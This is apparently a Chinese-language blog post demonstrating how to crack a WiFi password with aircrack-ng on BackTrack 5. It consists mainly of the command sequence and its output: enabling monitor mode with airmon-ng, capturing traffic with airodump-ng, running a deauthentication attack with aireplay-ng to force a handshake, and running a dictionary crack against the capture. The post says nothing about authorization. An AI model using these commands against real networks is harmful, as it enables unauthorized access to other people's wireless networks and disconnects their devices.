aircrack-ng破解wifi密碼試範

這次破解wifi密碼試範,在BT5平台進行,工具是aircrack-ng.主要步驟可觀看視頻,此文章負責講解視頻內容.之以什麽是aircrack-ng 請看這文http://hkbyko.blogspot.com/2012/08/aircrack-ng.html








ifconfig -a     查看系統所有網卡
eth0      Link encap:Ethernet  HWaddr 00:0c:29:68:29:c3 
          inet addr:192.168.211.130  Bcast:192.168.211.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe68:29c3/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:38 errors:0 dropped:0 overruns:0 frame:0
          TX packets:34 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4660 (4.6 KB)  TX bytes:3556 (3.5 KB)
          Interrupt:19 Base address:0x2024
lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:34 errors:0 dropped:0 overruns:0 frame:0
          TX packets:34 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2161 (2.1 KB)  TX bytes:2161 (2.1 KB)
wlan0     Link encap:Ethernet  HWaddr b0:48:7a:95:e7:66 
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

ifconfig wlan0 up  激活無線網卡
       wlan0 就是無線網卡,但不一定是wlan0 依系統而定,也有可能是wifi0.

airmon-ng start wlan0 設置無線網卡模式
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1449    dhclient3
1593    dhclient3
Process with PID 1593 (dhclient3) is running on interface wlan0

Interface       Chipset         Driver
wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
                                (monitor mode enabled on mon0)

monitor mode enabled on mon0 出現這行說明網卡以開啟監听模式,并以mon0為名,網卡隻有開啟監听模式才能抓包.


airodump-ng mon0  查看無線網絡信息
airodump-ng --ivs-w pacp -c 6 mon0 抓包
aireplay-ng -0 1 -a apmac -c clienmac mon0  進行Deauth 攻擊获取handshake
aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst pacp*.cap   開始破解

留言

這個網誌中的熱門文章

VMware Workstation 教學之三種網絡設定模式

SET命令詳解

分頁檔的設定